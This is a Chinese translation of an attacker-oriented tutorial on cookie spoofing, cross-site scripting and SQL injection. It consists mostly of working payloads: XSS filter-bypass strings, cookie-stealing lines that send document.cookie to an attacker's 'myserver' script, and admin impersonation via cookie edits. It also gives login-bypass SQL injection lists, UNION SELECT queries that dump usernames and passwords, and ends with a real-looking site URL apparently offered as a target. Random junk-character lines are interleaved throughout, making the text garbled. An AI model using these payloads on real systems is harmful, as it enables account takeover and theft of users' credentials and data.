XSS & SQL注入

admin

XSS & SQL注入
文章作者：CyberPhreak
译文作者：黯魂 [S.S.T]

5 w& L, s4 Z8 j8 g  x
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X Web Security - XSS & more X
4 B/ m0 B4 M6 L% NXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

7 t, G- _& \0 t1 L
7 g# k' r0 w- r( J) E~介绍
* H+ O/ o4 x  J  r5 T$ g: ^& z
# ]4 c" |1 {0 g在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力,因为大多数人都修补了简单的XSS漏洞.但是他们所忘记做的是修补比XSS的一个字符串更多的漏洞,并且php中特殊安全机制被用来防御XSS,而取代他们自己的方法.同时我将阐述的不仅仅是XSS,而是所有的web安全.

XXXXXXXXXXXXXXXXXXXXX
5 g! {2 T) `- E, E. f0 A) lX Table OF Contents X
  j* H. p% q& ]# ~XXXXXXXXXXXXXXXXXXXXX

( d4 Y) |4 Z- s1 yXXXXXXXXXXXXXXXXXXXX
X Cookie Editing X
$ n3 R0 T' V/ Q' C$ f! gX XSS X
X SQL Injection X
. s+ i7 i, T+ u- A0 V; j. GXXXXXXXXXXXXXXXXXXXX
% y2 a' G3 |* Q" c% R
! M% ]# v" f1 k$ N! m~什么是cookie

cookie就是一块数据.一旦你浏览一个站点并且注册一个帐号,一个cookie就被设置以记录你的信息.cookie仅仅保存你登录的信息以使站点检测以前你是否登录过,如果不是,它就会检测你的用户名和密码的正确性,然后登录.比如说在一个夜总会,你买了一张票,他们就会给你一张卡.因此你可以进进出出而不用每次都买票.而cookies比你所能看到的要复杂得多.夜总会只能记住你一晚上,但是cookies却能记住你一辈子.

~警告&欺骗

# ^: H) @. n' U那么现在你知道了cookie是什么...你如何看待它们?事实上,cookie编辑(修改)是最简单的方法之一.只要有一个浏览器,你就能够查看和编辑cookies,并且只需要一些基础的javascript知识.打开你的浏览器然后随便去一个网站吧,登录...现在输入javascript:alert(document.cookie).这时你应该可以看见一个用户名和密码.然而大多数站点现在都不使用cookies,而使用sessions.很遗憾,sessions不能被修改(服务端可以),不像cookies,一旦你修改了一个cookie你就可以欺骗你自己.现在让我们开始欺骗...假设你看到了一个警告框并且看到一些像这样的内容:

strusername=cnsst;strpassword=cnsst
% `! J) k% p5 o' t& {
: m2 z" s; W6 R- k/ B, E9 j$ y此时假设你知道'bitch'是一个管理员,可是你不知道密码. 由于脆弱的安全机制你不需要密码:javascript:void(document.cookie="strusername=bitch")
1 N! k3 L) O& Q9 h- v, p现在输入:javascript:alert(document.cookie).那几乎非常接近cookie修改了...
1 f0 o3 v+ a# ?6 M; }
# Q' h- C4 ^" k# B~什么是XSS

XSS,或者CSS,不管你更喜欢怎样称呼它,XSS(CSS)都代表着跨站脚本.基本上意思就是你能以任何方式注入脚本,来让它完成你想要做的.通过XSS你也可以截获输入信息,像用户名,密码以及cookies.这都将被讨论,所以接下来将会有很多例子,我们这篇文章应该能够帮你在XSS上发挥自己的创造力.

~为什么使用XSS
5 F" L" q5 |, [7 H: Y) h
& e6 e+ u( d, M7 ^+ a* i: C很明显的问题,通过XSS你能在客户端和服务器端执行任何类型的脚本.然而XSS却不仅仅局限于执行脚本上,还能截获输入.输入类似:<input name="name" type="name">
3 K0 a9 K, _( f你通过XSS截获输入,然后通过一个秘密文件把截获到的信息发送向你的站点.而这一切绝不是XSS所能实现的全部作用.XSS还能截获cookies.Cookies保存着有价值的信息,像用户名,密码等等.

6 K" p: l5 Z9 e+ t; {~让我们开始吧…
. t$ G+ t( a2 @! b; l- A
我假定你知道html和javascript,而php知识也有帮助,但却不是必要的.让我们从这个php脚本开始.
7 i1 r& V8 j( X4 F
XSS--跨站脚本&lt;html&gt;

/ y( d: e/ v1 I4 m: y&lt;body&gt;

&lt;form action="" method="GET"&gt;

&lt;!-- 我使用的GET方法,因为当我们利用的时候更容易练习. --&gt;

Script: &lt;input name="name" type="name"&gt;

&lt;input type="submit" value="submit"&gt;

& ^0 d7 q& g7 N&lt;/form&gt;

! ?; |& J) I# Q, y+ D2 D7 n! \$ Y4 a&lt;/body&gt;

&lt;/html&gt;
; V! v$ S4 `- ?4 l0 L

/ M' \3 M. a' ]% W" ^
&lt;?php
( r) Z4 V. h3 O0 z( z
" B# {  ?! H! d% e$name = $_GET['name'];
7 K& n& t5 _! C0 I5 o$ m
' I$ J  L7 Y" n" c0 {$ J4 S) o, Uecho("Hello $name");
+ F* |3 X: ~5 u7 I1 s
?&gt;
复制代码OK,我们应该都知道上面的代码有什么用...这是一个非常奇怪的脚本,没有一个人会在自己的站点上使用它(至少我没见过),但是它对初学者理解原理却真的很有用.来看看我输入后所得到的信息:
6 {7 Z, I; C1 `3 Z6 q, d7 Y0 n  ?  z
) ^" q! F" E8 o% i* \+ xcnsst
"Hello cnsst!"
- P- T+ b1 b% P
引号内的信息就是输出信息..注意看,现在我输入:
<script>alert(document.cookie)</script>
) H  k& |# F4 }8 Q9 r" f
那么它将会弹出document.cookie!所以它是易受XSS攻击的!

$ x) c" R1 V6 f$ N4 d现在我们已经对XSS有了一点了解,那让我们理解它.首先,脚本做的是取得你的输入然后粘贴它.嗯...也就是说我们能输入任何数据.所以?等等...任何数据...好的,你想问客户端和服务器端分别有什么语言? 让我告诉你,基本上客户端语言是建立在你客户端浏览器之上的:JavaScript,html, VBScript等等...

/ n; G7 o7 Q5 g  \1 E6 Y  v服务器端语言在另一边,不是建立在你客户端之上的,而建立在服务器之上,有php,asp等等...
/ R; v" F5 p0 s/ g
9 z, x* j9 o9 ]) b已有一些方法注入php,稍后我将说明.现在先想想这怎样才能对我们有帮助?注入javascript?简单.比如说你正在编写一个网站程序,由于是你的站点,所以你能使用所有你想使用的javascript(JS).因此其他任何人也可以,因为XSS允许你让网站运行你想要运行的任何脚本.

2 v# e+ l& D4 a2 b让我们看一个稍微复杂点的例子!
, E' l( z% f8 F, Z. l
假设你已经输入了<script>alert(document.cookie)</script>,并且回显是这样的:
8 R# ^1 w9 ?2 ]6 Q. p5 ^% i; Qscriptalert(document.cookie)/script
或者可能是这样的:
4 a6 D! }' ?2 b0 ^6 h3 r, s8 Rscriptalertdocument.cookie/script

可以看出更难利用了...不过有很多方法使用XSS,这只是其中一种.而且是其中最烂的方法之一.你看到当中的"<>"都被空字符" "替换了.
, h! r! L: [2 u" \
$ |+ S* I3 p# U让我们继续利用:
<<script>>alert(document.cookie)<</script>>

: K- J* [. b4 S. O, H$ \# |4 M5 K4 z你的输出将弹出document.cookie.
1 F7 _2 P! R! X; a4 s" P
, W2 @4 Y  P- {2 b! Q' F8 T现在来看看更狠的:
<<script>>alert((document.cookie))<<//script>>

7 W! l; t4 I5 c$ c/ N' e
6 ^, b5 b  |' E他们可能会替换所有的,或者只是"<>".所以如果一对不能得以执行,另一对就可以.现在,如果你看到:
3 i) h7 b8 G) L$ escriptalertdocument.cookie/script
或者 <<<script>>>alert(document.cookie)<<</script>>>  

4 m; C' ]- R  r! ]$ k. Z/ q他们可能替换2对来欺骗你,或者替换一些字母.试着用你自己的方法来利用...你输入:
<script>alert(document.cookie)</script>
6 n) ^! c3 W9 h* Q1 x: f3 D( L
输出像这样:srplert(document.cookie)srp

* |5 e. z6 p0 B6 U- B6 _仔细观察,你就会发现document.cookie中并没有什么被替换.为什么呢? 因为他们并不清楚你想要alert什么,以及你想做什么.所以他们只是猜测,就只阻止了"<>"以及script部分.怎么绕过?看看这个:
<<sccriiptt>>aalert(document.cookie)<<//sccriiptt>>

所有重复多余的部分刚好被替换!现在让我们来点更高级的!
0 |; P  R" N- T. B# K, n( ^! v
这次他们使用的仍然是替换,但是却检查了整个字符串!例如:
5 q/ d2 }: E* v  J# f<script>alert(document.cookie)</script>
6 R% O! r3 W! b/ o& a- A+ E
输出将是:
" {2 p6 p" x9 ^4 Y" s. {scriptalert(document.cookie)script
' M) H6 @5 V: n3 b2 u9 L
. c7 W5 Q+ G2 ]; W2 H$ |! Z看到这,你激动地说,"我知道该怎么做了!" OK,让我们按照你的方法来重新构造:
1 v& E: I: j( M2 o<<script>>alert(document.cookie)<</script>>
& s/ n0 U% j/ \6 z
( y# i7 t8 L: B( \1 n输出:scriptalert(document.cookie)script. 这时你可能会继续增加更多的<>.可是,他们替换了任何"<>",无论你输入多少个...看到我说"任何"了吗?使用下面这个例子:
6 f; w8 [2 X5 }* f$ h" Q5 S
<
script
>
alert
  K; }! I# v3 \5 ~7 h* B( @/ \(
document
" o1 ^& e# {9 y.
cookie
4 y$ z7 y& g' ~$ X)
+ j4 X' v. R! u& j$ ]- `* N% X5 o* q<
2 y, j7 S  r5 V, z/
3 J# E6 J. {* J: e9 D* Rscript
>
$ A4 q% E% E' k. }
! N' R8 }( m' I* i+ Q7 p  N
3 \. v( \2 e; z看看它,它没有替换"<>",它替换代码关键字.所以即便你写的是一句没有"<>"的代码,将仍然被替换,这就是我们为什么这样写的原因.假如对方使用更严格的标准,替换任何类型的代码,甚至是"alert"! 我们又该怎么改进呢?看看这个:
<
s
c
r
i
p
t
) B) b( i. x" Y>
a
l
" V3 a  _4 N2 z( o- d7 \& Y! x! |& ee
r
6 y# G7 {% g. T/ S! st
& N8 W0 I" P" U/ f) b5 p0 g1 N- y8 S(
# ]( X9 U; P& C" kd
o
c
% U5 s6 A  _8 s$ p+ _; S6 fu
0 X: q; V" M) w) I- Z7 \) X6 qm
* `- d- H" S- _: r! `$ Qe
n
5 {$ A6 _3 o7 S; p# Y2 C0 qt
% v( A% f' Y+ R' k) G4 M6 Z6 a.
: g$ x, P" k. l5 [  b; k6 sc
o
o
! I. h& ~+ n& w$ n9 c. w* Wk
i
e
)
# o, N; a/ u, q, ?<
) M* w* Q; m# z9 ?. l1 K/
2 f" a- U; X( F! u) O/ b9 L% Z7 Ws
* f4 o. |& K8 pc
5 B! D$ [& b" H& i' t% H3 g/ Tr
% O8 d4 }( g# p% {6 li
2 h7 }% O( ^7 l1 E4 o* G' M3 o" [p
t
8 _4 I9 P6 o- u3 d/
6 }  {+ Y6 Q) x- e>
6 p9 H- [- F+ ?/ [* M
( J  u4 n4 d6 |5 j这下应该可以了,但是如果他们仍然替换"<",你可以增加2对"<< >>"(并且你可以用任何字符取代document.cookie)
( x. P9 Y5 l7 L- V, t- \
/ N* z: H' P& e/ z还有更多我可以演示的替换,但是我教你的只是想让你发挥自己的创造力.
2 d3 I7 _5 j- X, c( T) L
$ P- }& f. `- r  o/ [. ]$ n6 q现在让我来讲讲其他XSS方法.前面我们已经讨论了客户端XSS,那么现在就来看看服务器端XSS.

首先让我说明它们之间的区别.客户端是从你浏览器经解释语言,如JavaScript (JS) VBScript (VBS)等而看到的.服务器端XSS是通过来自服务器端的语言,如php,asp等的XSS.客户端通过浏览器查看,服务器端通过服务器查看.
# }  v7 q4 {9 J
我们已经学会了怎样构造客户端XSS,而构造服务器端我们必须注入脚本到服务器上.要完成这个,我们需要找到一个像任何XSS的脚本,但是这个脚本能够保存你的XSS到服务器中.现在,假设你在一个网站上发表了一篇文章,现在要做的是取代文章,用XSS,为什么我们应该用JavaScript?为什么不用php?但是先让我给你看点东西.
5 F* f$ \/ h5 O' j7 vdocument.forms(0).action ="http://myserver/myscript.php
这既能在服务器端也能在客户端,没有关系.因此你的脚本将复制他们所输入的信息到那个表单中,并保存在我们站点上的一个*.txt文件中.
$ X, Z3 H' E: N/ Q$ ?6 Y8 ^' R1 K
再次假设你在网站上注册了一个帐号,并且可以自定义资料...
document.images(0).src="http://myserver/cookie.php"+document.cookie.
或者如果你有空间可以存放指向自定义内容的链接,你可以输入:
6 f- e2 b1 f$ D: Ajavascript:location.href="http://myserver/cookie.php"+document.cookie
8 j/ J+ a2 r5 W8 h/ i3 ^这将截获访问我们资料的用户的cookie.这可以用于任何地方而不仅仅在资料上,它只是一个例子.

) q/ r1 {: Z  z3 Z有时一个站点会回显你的UserAgent和Referer...现在让我们在DOS提示符下或者命令行窗口中试一试一些XSS,
+ a8 O$ D( k' w" C# y- r9 d) Gtelnet example.com
( O! ?7 n5 s, R5 c. K" V& gGET /page/toplacewhere_itechos_your_useragent.php HTTP/1.1
2 v" @% n3 W2 I/ A( v- U1 J) \User-Agent: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
( `- O$ Q3 g2 R( FReferer: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
* r" c' E; O6 c) L~什么是SQL注入
4 B( Z; f& D7 ]3 `8 ?( T
' \$ a4 e+ `9 m7 R, H! u# a& SSQL注入,网站中最大的安全问题之一.那么到底什么是SQL注入?其实也就是注入SQL.现在让我们来挖掘不同级别的SQL漏洞.假设你有一个像这样的登录页面:&lt;html&gt;

7 w: @1 I+ p0 V/ N( q) s&lt;body&gt;

/ v9 t9 k: l0 c# t- e&lt;form action="" method="POST"&gt;
9 p+ E1 O* E6 i
+ h1 J3 H' _7 {! k" m; ^9 w4 N# UUsername: &lt;input name="name" type="name"&gt;
1 X5 A( S- ^. s1 x% F
Password: &lt;input name="password" type="password"&gt;
$ |& f9 A5 Y7 r3 G# T; v3 \5 B
* c8 B* c( J2 W&lt;input type="submit" type="submit" value="Submit"&gt;
: m' h0 Q3 N, o
* ]4 [9 b: {3 H% B&lt;/form&gt;
! T) W8 a- B- x3 v1 y
&lt;/body&gt;

; o# w1 B. }% Y7 z9 W&lt;/html&gt;
6 |) g; N8 J; h9 m% P( H5 r6 p/ d复制代码这里面有一个XSS漏洞,但是不用担心它,没有办法猜出或者破解出密码.所以,我们该怎么办?SQL注入!
/ s6 |( C3 R5 @6 {& p
最简单的攻击是在用户名和密码那里输入"'".如果没有保护机制,此时你应该得到一个错误信息.如果你得到了,它就是极易受攻击的.可是错误信息毫无价值,除非你知道如何利用它.所以,我会给你一个你可以使用的注入列表,以便在你得到一个单引号的错误信息时使用.

'='
'OR 1=1--
'OR a=a--
/ s( L5 q- _0 E6 k7 F'OR'
- ]( _% }0 U( T
) O0 [! D0 V/ A% P; y7 M4 {/ |# H自从人们增强安全性以后,现在这些注入就很难发挥作用了,但是下面这个列表却是很多人在安全列表里没有注意到的:
( h2 [, Z: F- A6 X, x$ k
  t, a# v4 |- q7 P4 x3 K3 `'OR''='
'OR"="
+ l2 x. z1 n/ e( F1 V! T'OR'="
( T( _, {% d4 i: v# W8 V'OR '="
9 T0 T+ p: S) f* E7 b'OR "='
'OR ''='
'OR '=''
3 Y: s: ?$ n/ M9 f'OR "=''
( f4 [4 i$ u! x1 v: R9 f'OR ''="
8 j: W+ y6 q1 e
2 S4 I5 [) W* X5 Z, _, Z/ F
~
, [( r* \0 m( O( [. M  l现在让我说明UNION ALL SELECT声明,这将选出数据库中的一个表...所显示的内容取决于你所选择的列.
UNION ALL SELECT username,password FROM users

这个查询语句将执行,但是….如果毫无作用呢?
6 b3 v. P' K5 V% x' \$ DUNION ALL SELECT username,password FROM users WHERE username='OR "='
AND password='OR "='

你可能使用其他字符来替代'OR "='以注入存在的注入点.可是首先考虑一下,你是怎么知道表名的?实际上,你发现了一个SQL漏洞,它给了你错误信息,而错误信息包含了表名.

一旦你发现了漏洞,你就会按照习惯去用类似'OR "='的方法去进行注入,以得到表名.有时候你想从表中查询一些有用的数据,你却不得不选择所有的表,因为你并不知道所要查询的数据在哪个表里.下面的例子中存在20个不同表名的表,你试图查询一个ip的列表:
3 k, O/ A+ _9 w" iUNION ALL SELECT
8 s6 V7 [5 S) W- qip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip FROM logs
- A$ i/ O  J5 ?3 Q1 e) ^+ x* C6 Y0 PWHERE ip='OR''="
6 g" N2 Q+ y, k
现在你看到这个了吗?(我确信你已经看到了)
http://example.com/index.php?article=34
那将浏览Id为34的文章...让我们用"'"替换34:
8 J  p; e, l" Hhttp://example.com/index.php?article='
% I! I$ u8 H$ q9 c3 v, @

现在,记住我所说的,大多数人都没有意识到'所带来的不安全性,你总是能够尝试不同的注入方法,这里是一些例子:
# S9 J4 w- }: i# b* ?6 ghttp://example.com/index.php?article='
http://example.com/index.php?article='='
http://example.com/index.php?article='OR 1=1--
http://example.com/index.php?article='OR a=a--
http://example.com/index.php?article='OR '="
http://example.com/index.php?article='OR "='
0 t% A2 C6 M- i2 b* y7 I. h) Phttp://example.com/index.php?article='OR ''='
http://example.com/index.php?article='OR '=''
. a: z8 Y' D  e3 R+ \7 J4 K5 ahttp://example.com/index.php?article='OR''='
  M3 h: I, d+ N% {5 T4 L  c. Chttp://example.com/index.php?article='OR"'='
9 j# d: C! v: [http://example.com/index.php?article='OR"''='

尽情发挥自己的创造力!
http://www.ie.tsinghua.edu.cn/notice/show.php?id=704